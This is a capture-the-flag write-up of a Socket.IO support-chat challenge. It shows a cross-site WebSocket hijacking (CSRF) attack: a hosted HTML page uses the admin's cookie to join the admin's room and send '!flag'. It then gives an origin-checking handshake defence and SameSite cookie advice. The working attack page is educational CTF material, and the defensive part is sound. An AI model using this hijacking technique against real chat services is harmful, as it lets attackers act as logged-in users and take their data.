Tags: socket.io csrf web 

Rating:

First, we can register with any username/password combo.

Then, we are presented with a chatbot:

```text
Bot: Welcome to the support chat! An admin will be assisting you.
```

If we look at the source code of the site, we find that it is based on Socket.IO.

Trying to impersonate another user (by changing the `room` sent to the server) does not work, since the server appears to validate our cookie before it lets us join a room.

Now, let's try to enumerate what the chatbot lets us do.

We try sending some random text:

```text
User: random
Admin: Sorry, I can't help you if you don't provide context. Where is the error happening?
```

We also notice that there is a `!flag` command:

```text
User: !flag
Bot: Only the admin can run that command from our office
```

This implies that part of the vulnerability will involve some kind of XSS or CSRF.

After a few more guesses, we notice that posting a link makes the admin visit it:

```text
User: https://example.com
Admin: I am looking into https://example.com give me a moment...
```

So the vulnerability probably involves CSRF.

Connecting to the Socket.IO server from another origin does work, so the server does not check where a connection comes from; it only checks the cookie.

So all we need to do is host a page whose script sends `!flag`:

```html
<script src="https://cdn.jsdelivr.net/npm/socket.io-client@2/dist/socket.io.js"></script>
<script>
  // Connect to the challenge's Socket.IO namespace from our own origin.
  let socket = io('http://six.jh2i.com:50022/test');

  const username = 'admin';

  socket.on('connect', () => {
    console.log('connected!');
    // Join the admin's room; the server only checks the cookie, which the
    // admin's browser sends along with the cross-origin connection.
    socket.emit('join', {
      room: username
    });
    // Send the !flag command into that room.
    socket.emit('my_room_event', {
      data: '!flag',
      room: username
    });
  });
</script>
```

After giving the admin the URL, we see the flag magically come back to us in the chatroom.
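The root cause is that the server trusts the session cookie alone and never checks where the handshake came from. As an added example (not the challenge's code), here is the handshake gate a defender would put in front of the Socket.IO server: the origin allowlist, the session store and the function names are assumed for illustration.

```javascript
// Added example, not the challenge's server code. Rejects Socket.IO handshakes
// whose Origin header is not the application's own, then resolves the user
// from the session cookie. The challenge server did the second step only, so
// a page on any other site could open a socket that rode on the admin's cookie.

// Assumed: the only origin the chat UI is served from (taken from the writeup).
const ALLOWED_ORIGINS = new Set(['http://six.jh2i.com:50022']);

// Constructed session store for the example: cookie value -> username.
const SESSIONS = new Map([
  ['s3ss10n-admin', 'admin'],
  ['s3ss10n-user', 'user'],
]);

// Minimal Cookie header parser: "a=1; session=abc" -> { a: '1', session: 'abc' }.
function parseCookies(header = '') {
  const out = {};
  for (const part of header.split(';')) {
    const idx = part.indexOf('=');
    if (idx === -1) continue;
    out[part.slice(0, idx).trim()] = decodeURIComponent(part.slice(idx + 1).trim());
  }
  return out;
}

// Returns { ok: true, user } or { ok: false, reason }.
function checkHandshake(headers) {
  const origin = headers.origin;
  // Browsers send Origin on every WebSocket upgrade and on cross-site
  // XHR/fetch (Socket.IO's polling transport), so a missing or foreign
  // Origin means the handshake was not started by our own page.
  if (!origin || !ALLOWED_ORIGINS.has(origin)) {
    return { ok: false, reason: `origin not allowed: ${origin}` };
  }
  const user = SESSIONS.get(parseCookies(headers.cookie).session);
  if (!user) return { ok: false, reason: 'no valid session cookie' };
  return { ok: true, user };
}

// Wiring (assumed deployment; allowRequest is the engine.io option Socket.IO
// passes through): the socket's room is then derived from the cookie-backed
// user, never from the client-supplied `room` field.
//   const io = require('socket.io')(httpServer, {
//     allowRequest: (req, cb) => {
//       const r = checkHandshake(req.headers);
//       cb(r.ok ? null : r.reason, r.ok);
//     },
//   });
```

Setting the session cookie with `SameSite=Lax` or `Strict` is a second, independent layer: the browser then withholds it from cross-site handshakes even if the origin check is misconfigured.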